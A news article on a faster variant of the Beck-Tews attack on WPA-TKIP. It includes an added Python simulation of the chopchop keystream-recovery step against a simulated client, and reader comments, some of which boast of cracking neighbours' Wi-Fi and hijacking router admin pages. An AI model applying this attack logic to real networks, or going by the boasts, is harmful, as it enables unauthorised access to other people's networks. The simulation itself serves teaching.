WPA keys gone in 60 seconds
Time to move to WPA 2
Networking nerds claim to have devised a way of breaking Wi-Fi Protected Access (WPA) encryption within 60 seconds.
The technique, developed by Toshihiro Ohigashi of Hiroshima University and Masakatu Morii of Kobe University, builds on the established Beck-Tews method, which involves making small changes to packets encrypted with TKIP (Temporal Key Integrity Protocol, the WPA security mechanism) and sending the modified packets to a wireless client, whose reaction to each one tells the attacker whether the change was accepted.
However, the Beck-Tews method is known to take between 10 and 15 minutes to execute, because TKIP's countermeasures limit the attacker to roughly one successful guess per minute.
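To make the mechanism in the two paragraphs above concrete, here is a small Python simulation of the "chopchop" step that Beck-Tews applies to TKIP: the attacker strips the last byte of a captured frame, tries up to 256 corrections to the ciphertext, and uses the client's MIC failure report as a yes/no oracle, recovering one keystream byte (and so one plaintext byte) per accepted guess. It is an added example written for this page, not code from the paper or from any Wi-Fi tool. It assumes a simplified model: plain RC4 without TKIP's per-packet key mixing, no replay-counter handling (the part Beck-Tews gets around with unused QoS channels and Ohigashi-Morii with a man-in-the-middle position), a `Station` class standing in for the victim client, and a constructed ARP frame as sample input. The names `Station`, `chop_one`, `chopchop`, `demo` and `SAMPLE_MPDU` are this example's own.

```python
import os
import zlib

# CRC-32 table (reflected, polynomial 0xEDB88320): the CRC behind the 802.11 ICV.
CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    CRC_TABLE.append(_c)

def icv(data: bytes) -> bytes:
    """802.11 ICV: CRC-32 over the plaintext, sent least-significant byte first."""
    return zlib.crc32(data).to_bytes(4, "little")

def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (TKIP's cipher). Per-packet key mixing is omitted; only RC4 matters here."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

class Station:
    """The victim client (assumed model). It holds the per-packet key; the attacker never sees it."""
    def __init__(self, key: bytes):
        self.key = key

    def encrypt(self, plaintext: bytes) -> bytes:
        body = plaintext + icv(plaintext)
        return xor(body, rc4(self.key, len(body)))

    def mic_failure_report(self, frame: bytes) -> bool:
        """The attacker's oracle. Bad ICV: frame silently dropped (False). Good ICV: the
        Michael MIC is checked next, always fails on a chopped frame, and the client
        sends a MIC failure report that is visible on air (True)."""
        body = xor(frame, rc4(self.key, len(frame)))
        return icv(body[:-4]) == body[-4:]

# Constructed sample frame body: LLC/SNAP + ARP request + 8-byte Michael MIC field,
# i.e. what TKIP encrypts (the ICV is appended by Station.encrypt). Addresses are made up.
SAMPLE_MPDU = bytes.fromhex(
    "aaaa030000000806"        # LLC/SNAP, EtherType ARP
    "0001080006040001"        # ARP request, Ethernet/IPv4
    "0211223344550a000001"    # sender MAC, sender IP 10.0.0.1
    "0000000000000a000042"    # target MAC (unknown), target IP 10.0.0.66
    "0000000000000000"        # Michael MIC (placeholder value)
)

def chop_one(frame: bytes, oracle):
    """Chop the last byte of `frame`; return (keystream byte under it, accepted shorter frame, guesses)."""
    if len(frame) < 5:
        raise ValueError("need at least one data byte plus the 4-byte ICV")
    shorter = frame[:-1]
    for idx in range(256):
        t = CRC_TABLE[idx]
        # For the right idx this correction turns the truncated plaintext M'||b||ICV[0:3]
        # into M'||ICV(M'), whose ICV verifies. CRC-32 is linear, so it needs no key.
        delta = bytes([idx ^ 0xFF, t & 0xFF, (t >> 8) & 0xFF, (t >> 16) & 0xFF])
        candidate = shorter[:-4] + xor(shorter[-4:], delta)
        if oracle(candidate):
            chopped_plaintext = (t >> 24) ^ 0xFF   # last ICV byte of the frame we chopped
            return frame[-1] ^ chopped_plaintext, candidate, idx + 1
    raise RuntimeError("no guess accepted: the oracle is not behaving like a TKIP receiver")

def chopchop(frame: bytes, oracle, nbytes: int) -> bytes:
    """Recover the last `nbytes` keystream bytes, then the plaintext under them."""
    keystream, current = bytearray(), frame
    for _ in range(nbytes):
        k, current, _guesses = chop_one(current, oracle)
        keystream.insert(0, k)
    return xor(frame[-nbytes:], bytes(keystream))

def demo(payload: bytes = SAMPLE_MPDU, nbytes: int = 12):
    """Attack a freshly keyed station; returns (recovered plaintext tail, oracle queries used)."""
    station = Station(os.urandom(16))      # per-packet key, unknown to the attacker
    frame = station.encrypt(payload)       # the frame the attacker captured on air
    queries = 0

    def oracle(f: bytes) -> bool:
        nonlocal queries
        queries += 1
        return station.mic_failure_report(f)

    return chopchop(frame, oracle, nbytes), queries
```

`demo()` recovers the last 12 bytes of the sample frame, the 8-byte MIC field and the 4-byte ICV, without ever touching the key. Each byte costs up to 256 oracle queries, but only the one correct guess produces a MIC failure report, and a TKIP client that sees two such reports within 60 seconds rekeys, so a real attacker waits about a minute after every success; 12 bytes at one per minute is where the quarter-hour figure comes from. The rest of an ARP frame is mostly predictable, which is why Beck-Tews can finish the plaintext by guessing and then turn the recovered MIC against the network.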
In a recently released paper, Ohigashi and Morii proposed a man-in-the-middle style of attack, in which the attacker sits between the client and the access point and intercepts the user's communication; this replaces the Beck-Tews requirement that the network support the 802.11e QoS extensions.
This approach carries a high risk of detection, the pair admitted, so being able to shorten the attack time to under one minute is a major advantage – to potential hackers, at least.
Ohigashi's and Morii's technique doesn't work against WPA 2 using AES-CCMP, the successor to TKIP. The attack is specific to TKIP, so a WPA 2 network that still permits TKIP for older clients is not protected by the label alone.
The pair will formally unveil their technique at a conference in Hiroshima, Japan late next month. ®
Read the paper - neither this nor Beck-Tews can recover WPA keys. You can falsify ARP packets, which is fairly significant but a world away from recovering the key and being able to read all traffic in clear. "37% of WPA-TKIP encrypted ARP can be read and falsified in best case time of 60 seconds" is very different to the message that the media has portrayed. Disappointing reporting!!
Re: Brett 1
A novice couldn't do it, but the only reason for that is it has not been pre-packaged into an easy to use GUI for Windows. If someone did that then people would be under a lot more pressure to use more secure methods.
I know very little about how the methods work, but I managed to hack three of my neighbours and steal their internets (and also took control of the router admin so that I could open some ports for my torrents - BT Home Hub had loads of vulnerabilities).
I used aircrack-ng, which is a command line tool for Linux that basically does it all for you, although it doesn't hold your hand. It took a bit of working out, but there are tutorials out there.
People think they are safe but you don't know who your neighbour is. It might be me.
As someone who has on occasion done a bit of drive-by web access out of hours in times gone by,
I can confirm that those dumb APs that blast out their signal at max strength with a range of 100m+ sure are a boon to those of us who cannot afford to be camped out directly on the owner's doorstep just to get a bit of RPG/web action.
Oh, and a multi-boot netbook is more than enough to do the hunting and key breaking in Linux and RPG avatar web abuse in M$...